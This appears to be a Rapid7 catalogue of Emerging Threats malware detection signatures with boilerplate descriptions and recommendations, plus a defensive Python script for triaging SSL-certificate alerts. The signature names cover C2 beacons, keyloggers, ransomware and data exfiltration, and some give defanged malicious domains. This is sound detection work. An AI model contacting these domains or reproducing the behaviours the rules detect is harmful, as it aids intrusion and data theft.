ET MALWARE Malicious Cobalt Strike SSL Certificate (cloudflace-network .digital)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Downloader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Dropper Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious JS.Nemucod to PS Dropping PE Nov 14 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious lnk Downloader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Mega Chrome Extension Exfil Domain (www .megaopac .host in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious Second Stage Payload Inbound 2021-02-19

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious SSL Certificate detected (Cobalt Strike CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (FindPOS)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (OSX/Keydnap CnC)

Description

Recommendation

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (Patchwork CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL certificate detected (Possible Sinkhole)

Description

Recommendation

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Certificate detected (PyXie)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Malicious SSL Cert (Magecart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587
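The "Malicious SSL certificate" entries above all carry the same generic recommendation. The following Python helper is an added example, not Rapid7 or Emerging Threats code, showing how a responder would review such alerts in bulk: it reads Suricata-style EVE JSON records (an assumed export format), keeps only the SSL-certificate signature family, resolves which endpoint is the internal host regardless of the direction the rule was written in, and collects certificate subject and issuer so that a self-signed or otherwise odd certificate stands out before a host is rebuilt. The sample records, addresses, certificate names, signature IDs and the HOME_NETS ranges are all constructed for the example.

```python
"""Triage helper for "ET MALWARE Malicious SSL ..." alerts.

Added example, not Rapid7 or Emerging Threats code. Assumes the sensor can
export Suricata-style EVE JSON alert records (event_type "alert" carrying an
"alert" object and, for TLS flows, a "tls" object). Every sample record,
address, certificate name and signature ID below is a constructed placeholder.
"""
import ipaddress
import json
from collections import defaultdict

# Assumed internal address space; adjust to the monitored network.
HOME_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
SSL_CERT_PREFIX = "et malware malicious ssl cert"  # covers "Cert" and "certificate"
PYXIE = "ET MALWARE Malicious SSL Certificate detected (PyXie)"
MAGECART = "ET MALWARE Malicious SSL Cert (Magecart)"
MIRAI = "ET MALWARE Mirai Variant User-Agent (Outbound)"


def _alert(src, dst, sig, sid, tls=None):
    """Build one constructed EVE alert line (203.0.113.0/24 is documentation space)."""
    rec = {"event_type": "alert", "src_ip": src, "dest_ip": dst, "proto": "TCP",
           "alert": {"signature_id": sid, "rev": 1, "signature": sig, "severity": 1}}
    if tls:
        rec["tls"] = tls
    return json.dumps(rec)


SAMPLE_EVE_LINES = [
    # Here the remote server is src_ip and the client dest_ip; internal_peer() does not rely on that.
    _alert("203.0.113.7", "10.20.30.41", PYXIE, 9999901,
           {"subject": "CN=update.example-bad.test", "issuer": "CN=update.example-bad.test"}),
    _alert("203.0.113.9", "10.20.30.41", MAGECART, 9999902,
           {"subject": "CN=cdn.example-bad.test", "issuer": "CN=Example Test CA"}),
    _alert("203.0.113.7", "192.168.5.12", PYXIE, 9999901),   # handshake not logged
    _alert("10.20.30.42", "203.0.113.50", MIRAI, 9999903),   # unrelated family
    json.dumps({"event_type": "tls", "src_ip": "10.20.30.41", "dest_ip": "203.0.113.7"}),
    '{"event_type": "alert", "src_ip": "10.20.30.41"',      # truncated line
]


def is_home(addr):
    """True when addr falls inside the configured internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in HOME_NETS)


def internal_peer(rec):
    """Return the internal endpoint of the flow; certificate rules fire on the
    server-to-client side, so the infected client may be src_ip or dest_ip."""
    for key in ("src_ip", "dest_ip"):
        if is_home(rec[key]):
            return rec[key]
    return None


def parse_alerts(lines):
    """Yield alert records, skipping non-alert events and unparsable lines."""
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_type") == "alert" and "alert" in rec:
            yield rec


def triage(lines):
    """Summarise SSL-certificate alerts per internal host."""
    hosts = defaultdict(lambda: {"alerts": 0, "signatures": set(), "servers": set(),
                                 "cert_subjects": set(), "self_signed": False, "missing_tls": 0})
    for rec in parse_alerts(lines):
        sig = rec["alert"].get("signature", "")
        if not sig.lower().startswith(SSL_CERT_PREFIX):
            continue
        host = internal_peer(rec)
        if host is None:
            continue
        remote = rec["src_ip"] if rec["dest_ip"] == host else rec["dest_ip"]
        h = hosts[host]
        h["alerts"] += 1
        h["signatures"].add(sig)
        h["servers"].add(remote)
        tls = rec.get("tls")
        if not tls:
            h["missing_tls"] += 1      # nothing to confirm here; pull the flow log
            continue
        subject, issuer = tls.get("subject"), tls.get("issuer")
        if subject:
            h["cert_subjects"].add(subject)
        if subject and subject == issuer:
            h["self_signed"] = True    # self-signed certificates are common for C2
    return dict(hosts)


def rebuild_candidates(summary):
    """Internal hosts ordered by distinct signatures hit, then alert count."""
    return sorted(summary, key=lambda ip: (-len(summary[ip]["signatures"]),
                                           -summary[ip]["alerts"], ip))
```

Feed real EVE lines in place of SAMPLE_EVE_LINES and call triage() followed by rebuild_candidates(). Ranking by distinct signatures rather than raw alert volume avoids one chatty server pushing a single host to the top, and the missing_tls counter flags alerts where the certificate fields were not logged and the flow record has to be pulled by hand.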

ET MALWARE Malicious VBE Script (COVID-19 Phish 2020-04-03)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious VBS Downloader fake image zip

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious XLS DDE rar Drop Attempt (.live)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Malicious XLS DDE rar Drop Fake 404 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mal/Ransom-CE Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MASSLOGGER Client Data Exfil (POST) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MassLogger Client Exfil (POST) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matanbuchus Loader CnC M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matanbuchus Loader Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matiex Keylogger Exfil Via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matryoshka CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matsnu Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maze/ID Ransomware Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mazilla Suspicious User-Agent Jan 15 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Medfos Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Medfos/Midhos Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP Variant CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP Variant CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Megalodon/Gomorrah/CosaNostra HTTP Bot CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MegalodonHTTP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MegalodonHTTP CoinMiner Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE MegalodonHTTP/LuciferHTTP Client Action

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Megumin v2 Stealer User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mekotio HTTP Method (111SA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mera Keylogger POSTing keystrokes

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Meredrop/Nusump Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mermaid Ransomware Variant CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Mespinoza Ransomware - Pre-Encryption File Exfil to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question and isolate the affected host promptly, since this signature is associated with ransomware activity. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE METALJACK APT32 CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mevade Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Domain Observed in SNI (samwinchester .club)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Reporting Infected System Information and RAT Version

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Response M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Screenshot Upload M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Screenshot Upload M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Sending JPG Screenshot to CnC with .his Extension

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Midhos/Medfos downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MilkyBoy CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MilkyBoy CnC Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE/MINEDOOR CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke variant C&C activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke Variant CnC Beacon via WebDAV

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Minirem

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirage Campaign checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Client Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Client Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miuref/Boaxxe Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ModPipe CnC Activity (POST)

Description

